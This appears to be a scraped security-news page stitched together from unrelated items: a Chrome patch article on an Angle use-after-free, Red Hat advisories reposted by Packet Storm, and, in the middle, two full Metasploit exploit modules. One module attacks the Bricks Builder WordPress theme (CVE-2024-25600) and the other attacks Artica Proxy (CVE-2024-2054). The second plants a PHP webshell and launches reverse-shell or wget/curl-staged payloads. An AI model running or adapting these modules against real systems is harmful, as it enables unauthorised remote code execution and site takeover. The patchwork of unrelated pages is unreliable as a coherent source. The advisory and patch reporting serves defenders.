Google has released an update for Chrome to fix seven security vulnerabilities.

Google has released an update to Chrome which includes seven security fixes. Version 123.0.6312.86/.87 of Chrome for Windows and Mac and 123.0.6312.86 for Linux will roll out over the coming days/weeks.

The easiest way to update Chrome is to allow it to update automatically, which basically uses the same method as outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong—such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then. And now would be a good time, given the severity of the vulnerability in this patch. My preferred method is to have Chrome open the page chrome://settings/help which you can also find by clicking **Settings > About Chrome**.

If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is relaunch the browser in order for the update to complete, and for you to be safe from those vulnerabilities.

_After the update, the version should be 123.0.6312.86, or later_

**Technical details**

Google never gives out a lot of information about vulnerabilities, for obvious reasons. Access to bug details and links may be kept restricted until a majority of users are updated with a fix.

There is one critical vulnerability that looks like it might be of interest to cybercriminals.

CVE-2024-2883: Use after free (UAF) vulnerability in Angle in Google Chrome prior to 123.0.6312.86 could allow a remote attacker to potentially exploit heap corruption via a crafted HTML page.

Angle is a browser component that deals with WebGL (short for Web Graphics Library) content. WebGL is a JavaScript API for rendering interactive 2D and 3D graphics within any compatible web browser without the use of plug-ins.

UAF is a type of vulnerability that is the result of the incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program. Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code. In this case, when the vulnerability is exploited, it can lead to heap corruption.

Heap corruption occurs when a program modifies the contents of a memory location outside of the memory allocated to the program. The outcome can be relatively benign and cause a memory leak, or it may be fatal and cause a memory fault, usually in the program that causes the corruption.

Chromium vulnerabilities are considered critical if they “allow an attacker to read or write arbitrary resources (including but not limited to the file system, registry, network, etc.) on the underlying platform, with the user’s full privileges.”

So, to sum this up, in this case an attacker could create a specially crafted HTML page–which can be put online as a website–that exploits the vulnerability, potentially leading to a compromised system.

My suggestion: don’t wait for the update, get it now.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using ThreatDown Vulnerability and Patch Management.

 Update Chrome now! Google patches possible drive-by vulnerability 

This Metasploit module exploits an unauthenticated remote code execution vulnerability in the Bricks Builder Theme versions 1.9.6 and below for WordPress. The vulnerability allows attackers to execute arbitrary PHP code by leveraging a nonce leakage to bypass authentication and exploit the eval() function usage within the theme. Successful exploitation allows for full control of the affected WordPress site. It is recommended to upgrade to version 1.9.6.1 or higher.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HTTP::Wordpress  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Unauthenticated RCE in Bricks Builder Theme',        'Description' => %q{          This module exploits an unauthenticated remote code execution vulnerability in the          Bricks Builder Theme versions <= 1.9.6 for WordPress. The vulnerability allows attackers          to execute arbitrary PHP code by leveraging a nonce leakage to bypass authentication and          exploit the eval() function usage within the theme. Successful exploitation allows for full          control of the affected WordPress site. It is recommended to upgrade to version 1.9.6.1 or higher.        },        'Author' => [          'Calvin Alkan', # Vulnerability discovery          'Valentin Lobstein' # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2024-25600'],          ['URL', 'https://github.com/Chocapikk/CVE-2024-25600'],          ['URL', 'https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6'],          ['WPVDB', 'afea4f8c-4d45-4cc0-8eb7-6fa6748158bd']        ],        'DisclosureDate' => '2024-02-19',        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        },        'Platform' => ['unix', 'linux', 'win', 'php'],        'Arch' => [ARCH_PHP, ARCH_CMD],        'Targets' => [          [            'PHP In-Memory',            {              'Platform' => 'php',              'Arch' => ARCH_PHP,              'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' },              'Type' => :php_memory            }          ],          [            'Unix In-Memory',            {              'Platform' => ['unix', 'linux'],              'Arch' => ARCH_CMD,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp' },              'Type' => :unix_memory            }          ],          [            'Windows In-Memory',            {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp' },              'Type' => :win_memory            }          ],        ],        'Privileged' => false      )    )  end  def fetch_nonce    uri = normalize_uri(target_uri.path)    res = send_request_cgi('method' => 'GET', 'uri' => uri)    return nil unless res&.code == 200    script_tag_match = res.body.match(%r{<script id="bricks-scripts-js-extra"[^>]*>([\s\S]*?)</script>})    return nil unless script_tag_match    script_content = script_tag_match[1]    nonce_match = script_content.match(/"nonce":"([a-f0-9]+)"/)    nonce_match ? nonce_match[1] : nil  end  def exploit    nonce = fetch_nonce    fail_with(Failure::NoAccess, 'Failed to retrieve nonce. Exiting...') unless nonce    print_good("Nonce retrieved: #{nonce}")    send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'index.php'),      'ctype' => 'application/json',      'data' => {        'postId' => rand(1..10000).to_s,        'nonce' => nonce,        'element' => {          'name' => 'code',          'settings' => {            'executeCode' => 'true',            'code' => "<?php #{payload_instance.arch.include?(ARCH_PHP) ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'))"} ?>"          }        }      }.to_json,      'vars_get' => {        'rest_route' => '/bricks/v1/render_element'      }    )  end  def check    return CheckCode::Unknown('WordPress does not appear to be online.') unless wordpress_and_online?    wp_version = wordpress_version    print_status("WordPress Version: #{wp_version}") if wp_version    theme_check_code = check_theme_version_from_style('bricks', '1.9.6.1')    return CheckCode::Unknown('The Bricks Builder theme does not appear to be installed') unless theme_check_code    return CheckCode::Detected('The Bricks Builder theme is running but the version was unable to be determined') if theme_check_code.code == 'detected'    return CheckCode::Safe("The Bricks Builder is running version: #{theme_check_code.details[:version]}, which is not vulnerable.") unless theme_check_code.code == 'appears'    theme_version = theme_check_code.details[:version]    print_good("Detected Bricks Builder theme version: #{theme_version}")    CheckCode::Appears  endend

WordPress Bricks Builder Theme 1.9.6 Remote Code Execution

A command injection vulnerability in Artica Proxy appliance versions 4.50 and 4.40 allows remote attackers to run arbitrary commands via an unauthenticated HTTP request. The Artica Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the www-data user.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Artica Proxy Unauthenticated PHP Deserialization Vulnerability',        'Description' => %q{          A Command Injection vulnerability in Artica Proxy appliance version 4.50 and 4.40          allows remote attackers to run arbitrary commands via unauthenticated HTTP request.          The Artica Proxy administrative web application will deserialize arbitrary PHP objects          supplied by unauthenticated users and subsequently enable code execution as the "www-data" user.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor          'Jaggar Henry of KoreLogic Inc.' # Discovery of the vulnerability        ],        'References' => [          ['CVE', '2024-2054'],          ['URL', 'https://attackerkb.com/topics/q1JUcEJjXZ/cve-2024-2054'],          ['PACKETSTORM', '177482']        ],        'DisclosureDate' => '2024-03-05',        'Platform' => ['php', 'unix', 'linux'],        'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86],        'Privileged' => false,        'Targets' => [          [            'PHP',            {              'Platform' => ['php'],              'Arch' => ARCH_PHP,              'Type' => :php,              'DefaultOptions' => {                'PAYLOAD' => 'php/meterpreter/reverse_tcp'              }            }          ],          [            'Unix Command',            {              'Platform' => ['unix', 'linux'],              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => ['linux'],              'Arch' => [ARCH_X64, ARCH_X86],              'Type' => :linux_dropper,              'CmdStagerFlavor' => ['wget', 'curl', 'bourne', 'printf', 'echo'],              'Linemax' => 16384,              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'SSL' => true,          'RPORT' => 9000        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('TARGETURI', [ true, 'The Artica Proxy endpoint URL', '/' ]),      OptString.new('WEBSHELL', [false, 'Set webshell name without extension. Name will be randomly generated if left unset.', nil]),      OptEnum.new('COMMAND',                  [true, 'Use PHP command function', 'passthru', %w[passthru shell_exec system exec]], conditions: %w[TARGET != 0])    ])  end  def execute_php(cmd, _opts = {})    payload = Base64.strict_encode64(cmd)    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'wizard', @webshell_name),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        @post_param => payload      }    })  end  def execute_command(cmd, _opts = {})    payload = Base64.strict_encode64(cmd)    php_cmd_function = datastore['COMMAND']    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'wizard', @webshell_name),      'ctype' => 'application/x-www-form-urlencoded',      'vars_get' => {        @get_param => php_cmd_function      },      'vars_post' => {        @post_param => payload      }    })  end  def upload_webshell    # randomize file name if option WEBSHELL is not set    @webshell_name = (datastore['WEBSHELL'].blank? ? "#{Rex::Text.rand_text_alpha(8..16)}.php" : "#{datastore['WEBSHELL']}.php")    @webshell_full_path = "/usr/share/artica-postfix/wizard/#{@webshell_name}"    @post_param = Rex::Text.rand_text_alphanumeric(1..8)    @get_param = Rex::Text.rand_text_alphanumeric(1..8)    # Upload webshell with PHP payload    if target['Type'] == :php      php_payload = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"    else      php_payload = "<?=$_GET[\'#{@get_param}\'](base64_decode($_POST[\'#{@post_param}\']));?>"    end    php_payload_len = php_payload.length    webshell_full_path_len = @webshell_full_path.length    final_payload = "O:19:\"Net_DNS2_Cache_File\":4:{s:10:\"cache_file\";s:#{webshell_full_path_len}:\"#{@webshell_full_path}\";s:16:\"cache_serializer\";s:4:\"json\";s:10:\"cache_size\";i:9999999999;s:10:\"cache_data\";a:1:{s:#{php_payload_len}:\"#{php_payload}\";a:2:{s:10:\"cache_date\";i:0;s:3:\"ttl\";i:9999999999;}}}"    final_payload_b64 = Base64.strict_encode64(final_payload)    return send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'wizard', 'wiz.wizard.progress.php'),      'ctype' => 'application/x-www-form-urlencoded',      'vars_get' => {        'build-js' => final_payload_b64      }    })  end  def check    print_status("Checking if #{peer} can be exploited.")    res = send_request_cgi!({      'method' => 'GET',      'ctype' => 'application/x-www-form-urlencoded',      'uri' => normalize_uri(target_uri.path)    })    return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200    # Check if target is an Artica Proxy appliance    # Search for the Artica Version tag on the login page    html = res.get_html_document    unless html.blank?      version_match = html.text.match(/Artica.{1,2}\d\.\d\d/)      return CheckCode::Unknown('No Artica version found.') if version_match.nil?      version = version_match[0].split(' ')      if version.count > 1 && Rex::Version.new(version[1]) <= Rex::Version.new('4.50') && Rex::Version.new(version[1]) >= Rex::Version.new('4.40')        return CheckCode::Vulnerable("Artica version: #{version[1]}")      else        return CheckCode::Safe("Artica version: #{version[1]}")      end    end    CheckCode::Unknown  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    res = upload_webshell    fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 500    register_file_for_cleanup(@webshell_full_path)    case target['Type']    when :php      execute_php(payload.encoded)    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      # Don't check the response here since the server won't respond      # if the payload is successfully executed.      execute_cmdstager({ linemax: target.opts['Linemax'] })    end  endend

Artica Proxy Unauthenticated PHP Deserialization

Red Hat Security Advisory 2024-1533-03 - An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a code execution vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1533.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: kernel-rt security and bug fix update  
Advisory ID:        RHSA-2024:1533-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1533  
Issue date:         2024-03-27  
Revision:           03  
CVE Names:          CVE-2024-0565  
====================================================================

Summary: 

An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: CIFS Filesystem Decryption Improper Input Validation Remote Code Execution Vulnerability in function receive_encrypted_standard of client (CVE-2024-0565)

* kernel: sched/membarrier: reduce the ability to hammer on sys_membarrier (CVE-2024-26602)

Bug Fix(es):

* kernel-rt: kernel: CIFS Filesystem Decryption Improper Input Validation Remote Code Execution Vulnerability in function receive_encrypted_standard of client (JIRA:RHEL-22083)

* kernel-rt: update RT source tree to the latest RHEL-9.2.z7 Batch (JIRA:RHEL-28866)

* [RHEL9.3 nightly] NMI panic sometimes fails to start the 2nd kernel for kdump (JIRA:RHEL-24448)

* kernel-rt: kernel: sched/membarrier: reduce the ability to hammer on sys_membarrier (JIRA:RHEL-26382)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-0565

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2258518  
https://bugzilla.redhat.com/show_bug.cgi?id=2267695

Red Hat Security Advisory 2024-1533-03

Red Hat Security Advisory 2024-1532-03 - An update for kernel is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a code execution vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1532.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: kernel security and bug fix update  
Advisory ID:        RHSA-2024:1532-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1532  
Issue date:         2024-03-27  
Revision:           03  
CVE Names:          CVE-2024-0565  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: CIFS Filesystem Decryption Improper Input Validation Remote Code Execution Vulnerability in function receive_encrypted_standard of client (CVE-2024-0565)

* kernel: sched/membarrier: reduce the ability to hammer on sys_membarrier (CVE-2024-26602)

Bug Fix(es):

* kernel: CIFS Filesystem Decryption Improper Input Validation Remote Code Execution Vulnerability in function receive_encrypted_standard of client (JIRA:RHEL-22081)

* dpll: fix unordered unbind/bind registerer issues (JIRA:RHEL-25714)

* update mm to upstream v6.0 (JIRA:RHEL-28164)

* kernel: sched/membarrier: reduce the ability to hammer on sys_membarrier (JIRA:RHEL-26378)

* ice: support features on new E810T variants  (JIRA:RHEL-28589)

* xfs_growfs: XFS_IOC_FSGROWFSDATA xfsctl failed: No space left on device (RHEL9) (JIRA:RHEL-28689)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-0565

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2258518  
https://bugzilla.redhat.com/show_bug.cgi?id=2267695

Red Hat Security Advisory 2024-1532-03

Red Hat Security Advisory 2024-1530-03 - An update for expat is now available for Red Hat Enterprise Linux 9. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1530.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: expat security update  
Advisory ID:        RHSA-2024:1530-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1530  
Issue date:         2024-03-26  
Revision:           03  
CVE Names:          CVE-2023-52425  
====================================================================

Summary: 

An update for expat is now available for Red Hat Enterprise Linux 9.

'Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Expat is a C library for parsing XML documents.

Security Fix(es):

* expat: parsing large tokens can trigger a denial of service (CVE-2023-52425)

* expat: XML Entity Expansion (CVE-2024-28757)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-52425

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.3_release_notes/index  
https://bugzilla.redhat.com/show_bug.cgi?id=2262877  
https://bugzilla.redhat.com/show_bug.cgi?id=2268766

Red Hat Security Advisory 2024-1530-03

Red Hat Security Advisory 2024-1522-03 - An update for dnsmasq is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1522.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: dnsmasq security updateAdvisory ID:        RHSA-2024:1522-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1522Issue date:         2024-03-26Revision:           03CVE Names:          CVE-2023-50387====================================================================Summary: An update for dnsmasq is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The dnsmasq packages contain Dnsmasq, a lightweight DNS (Domain Name Server) forwarder and DHCP (Dynamic Host Configuration Protocol) server.Security Fix(es):* dnsmasq: bind9: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)* dnsmasq: bind9: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-50387References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263914https://bugzilla.redhat.com/show_bug.cgi?id=2263917

Red Hat Security Advisory 2024-1522-03

Red Hat Security Advisory 2024-1515-03 - An update for squid is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1515.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: squid security and bug fix updateAdvisory ID:        RHSA-2024:1515-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1515Issue date:         2024-03-26Revision:           03CVE Names:          CVE-2024-25111====================================================================Summary: An update for squid is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Squid is a high-performance proxy caching server for web clients, supporting FTP and HTTP data objects.Security Fix(es):* squid: Denial of Service in HTTP Chunked Decoding (CVE-2024-25111)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-25111References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2268366

Red Hat Security Advisory 2024-1515-03

Red Hat Security Advisory 2024-1514-03 - An update for libreoffice is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1514.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: libreoffice security fix updateAdvisory ID:        RHSA-2024:1514-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1514Issue date:         2024-03-26Revision:           03CVE Names:          CVE-2023-6185====================================================================Summary: An update for libreoffice is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:LibreOffice is an open source, community-developed office productivity suite. It includes key desktop applications, such as a word processor, a spreadsheet, a presentation manager, a formula editor, and a drawing program. LibreOffice replaces OpenOffice and provides a similar but enhanced and extended office suite.Security Fix(es):* libreoffice: Improper Input Validation leading to arbitrary gstreamer plugin execution (CVE-2023-6185)* libreoffice: Insufficient macro permission validation leading to macro execution (CVE-2023-6186)Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-6185References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2254003https://bugzilla.redhat.com/show_bug.cgi?id=2254005

Red Hat Security Advisory 2024-1514-03

Red Hat Security Advisory 2024-1513-03 - An update for libreoffice is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1513.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: libreoffice security fix updateAdvisory ID:        RHSA-2024:1513-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1513Issue date:         2024-03-26Revision:           03CVE Names:          CVE-2023-6185====================================================================Summary: An update for libreoffice is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:LibreOffice is an open source, community-developed office productivity suite. It includes key desktop applications, such as a word processor, a spreadsheet, a presentation manager, a formula editor, and a drawing program. LibreOffice replaces OpenOffice and provides a similar but enhanced and extended office suite.Security Fix(es):* libreoffice: Improper Input Validation leading to arbitrary gstreamer plugin execution (CVE-2023-6185)* libreoffice: Insufficient macro permission validation leading to macro execution (CVE-2023-6186)Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-6185References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2254003https://bugzilla.redhat.com/show_bug.cgi?id=2254005

Tag

#linux